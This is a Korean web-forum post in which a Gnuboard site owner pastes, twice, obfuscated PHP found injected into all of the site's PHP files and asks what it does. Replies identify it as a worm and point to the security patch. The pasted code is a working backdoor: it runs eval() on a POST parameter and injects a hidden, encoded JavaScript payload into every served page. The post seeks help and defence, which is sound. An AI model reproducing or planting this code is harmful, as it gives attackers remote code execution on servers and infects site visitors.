아무래도 해킹인듯 싶은데....요상한 코드가 그누파일들에 삽입되어 있네요... 정보
아무래도 해킹인듯 싶은데....요상한 코드가 그누파일들에 삽입되어 있네요...
본문
이거 뭐하는 코드일까요?
그누 폴더 내의 모든 php 파일에 다 삽입되어 있네요.
여기 고수님들중에는 이런거 보시고 하실분도 있을듯 해서 여기다 올려요...
보시고, 그누의 취약점 해결에 도움이 되면 좋겠어요..
=======================요상한 코드=========================
<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIApldmFsKHVuZXNjYXBlKCdgJTJGYCUyRiQlMkUlMkUlMkUAfCUzQ34lNjQlNjl2QCUyMH4lNzN0fiU3OWxlJTNEQCU2NHxpfnMlNzB+bCMlNjEkJTc5YDohbiU2RiZuJTY1fCUzRVxuYGQmJTZGI2MlNzVtJTY1JCU2RSU3NCUyRSElNzdyYGl0JTY1JCUyOCUyMiUzQyMlMkYlNzRlJCU3OGB0JCU2MX4lNzJlYCU2MSUzRSImJTI5ITskJTc2QCU2MXIlMjAlNjklMkN8JTVGfCUyQ2AlNjEmPSU1QiJAJTMyJCUzMSUzOH4lMkU5fDMkJTJFJTMyfiUzMCQlMzIlMkUlMzZAMSUyMiwkJTIyJiUzOSQlMzQkJTJFJTMyITR8N2AlMkUyfiUyRTU4IyUyMn4lNUQ7JTVGJCUzRH4xJTNCJTY5JTY2fCUyOGR+b3wlNjMlNzVtJTY1Jm4hdCEuYGMlNkZ8b3wlNkIhJTY5JCU2NSQlMkUlNkR+JTYxJCU3NCU2M2BoKGAvYCU1QyU2MiU2OH5nJiU2NnR+PSUzMSUyRiYpfD09fG5+dWxgbCl+JTY2JTZGcnwlMjhpISUzRCUzMCUzQmklM0MlMzJAJTNCJiU2OSUyQnwrJTI5IWRgb2N+JTc1YG18ZUBufiU3NC4lNzclNzJpJCU3NCU2NSUyOCUyMiUzQyU3MyU2MyQlNzIlNjkkJTcwJnQlM0VpfCU2NiUyOCZfKX4lNjQlNkYlNjN1JTZEfiU2NW5+dCQlMkV8JTc3cml0JTY1JTI4JTVDIn4lM0MlNzMkJTYzQCU3MmkkJTcwJCU3NCUyMH4lNjlgZH49QF8lMjIraUArIl8lMjBzJCU3Mn5jJCUzRCMvYC9AInwrYVsjaWAlNUQhJTJCIkAvY2AlNzAvQCUzRUAlM0MlNUMlNUMkJTJGJTczQGMhcn5pcEB0JTNFfiU1Q0AlMjIhJTI5fiUzQ2AlNUMvJTczJCU2MyU3MmAlNjkhJTcwfnQjJTNFJiUyMiYlMjkjJTNCYFxuLyUyRiYlM0MkJTJGfCU2NGklNzYlM0UnKS5yZXBsYWNlKC9AfGB8XCZ8XCF8I3xcfHxcJHx+L2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
===========================================================
그누 폴더 내의 모든 php 파일에 다 삽입되어 있네요.
여기 고수님들중에는 이런거 보시고 하실분도 있을듯 해서 여기다 올려요...
보시고, 그누의 취약점 해결에 도움이 되면 좋겠어요..
=======================요상한 코드=========================
<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIApldmFsKHVuZXNjYXBlKCdgJTJGYCUyRiQlMkUlMkUlMkUAfCUzQ34lNjQlNjl2QCUyMH4lNzN0fiU3OWxlJTNEQCU2NHxpfnMlNzB+bCMlNjEkJTc5YDohbiU2RiZuJTY1fCUzRVxuYGQmJTZGI2MlNzVtJTY1JCU2RSU3NCUyRSElNzdyYGl0JTY1JCUyOCUyMiUzQyMlMkYlNzRlJCU3OGB0JCU2MX4lNzJlYCU2MSUzRSImJTI5ITskJTc2QCU2MXIlMjAlNjklMkN8JTVGfCUyQ2AlNjEmPSU1QiJAJTMyJCUzMSUzOH4lMkU5fDMkJTJFJTMyfiUzMCQlMzIlMkUlMzZAMSUyMiwkJTIyJiUzOSQlMzQkJTJFJTMyITR8N2AlMkUyfiUyRTU4IyUyMn4lNUQ7JTVGJCUzRH4xJTNCJTY5JTY2fCUyOGR+b3wlNjMlNzVtJTY1Jm4hdCEuYGMlNkZ8b3wlNkIhJTY5JCU2NSQlMkUlNkR+JTYxJCU3NCU2M2BoKGAvYCU1QyU2MiU2OH5nJiU2NnR+PSUzMSUyRiYpfD09fG5+dWxgbCl+JTY2JTZGcnwlMjhpISUzRCUzMCUzQmklM0MlMzJAJTNCJiU2OSUyQnwrJTI5IWRgb2N+JTc1YG18ZUBufiU3NC4lNzclNzJpJCU3NCU2NSUyOCUyMiUzQyU3MyU2MyQlNzIlNjkkJTcwJnQlM0VpfCU2NiUyOCZfKX4lNjQlNkYlNjN1JTZEfiU2NW5+dCQlMkV8JTc3cml0JTY1JTI4JTVDIn4lM0MlNzMkJTYzQCU3MmkkJTcwJCU3NCUyMH4lNjlgZH49QF8lMjIraUArIl8lMjBzJCU3Mn5jJCUzRCMvYC9AInwrYVsjaWAlNUQhJTJCIkAvY2AlNzAvQCUzRUAlM0MlNUMlNUMkJTJGJTczQGMhcn5pcEB0JTNFfiU1Q0AlMjIhJTI5fiUzQ2AlNUMvJTczJCU2MyU3MmAlNjkhJTcwfnQjJTNFJiUyMiYlMjkjJTNCYFxuLyUyRiYlM0MkJTJGfCU2NGklNzYlM0UnKS5yZXBsYWNlKC9AfGB8XCZ8XCF8I3xcfHxcJHx+L2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
===========================================================
댓글 전체
웜으로 판단됩니다.
그누보드 보안패치글을 참고하여 패치하시고,
변경파일검사등도 보안패치글에 있으니 참고하여 위와 같은 부분들은 모두 삭제하십시오.
# 게시판용도 준수
그누보드 보안패치글을 참고하여 패치하시고,
변경파일검사등도 보안패치글에 있으니 참고하여 위와 같은 부분들은 모두 삭제하십시오.
# 게시판용도 준수
이미 그렇게 하고 있긴 한데요..ㅎㅎ
계시판 용도...ㅋㅋ...잘 알고 있습니다만...아무래도 여기가 더 북적거리고 해서....더 많이 볼수 있지 않을까 싶어서 그랬는데....설마 그랬다고 돌 던지진 않겠죠....ㅜㅜ
계시판 용도...ㅋㅋ...잘 알고 있습니다만...아무래도 여기가 더 북적거리고 해서....더 많이 볼수 있지 않을까 싶어서 그랬는데....설마 그랬다고 돌 던지진 않겠죠....ㅜㅜ
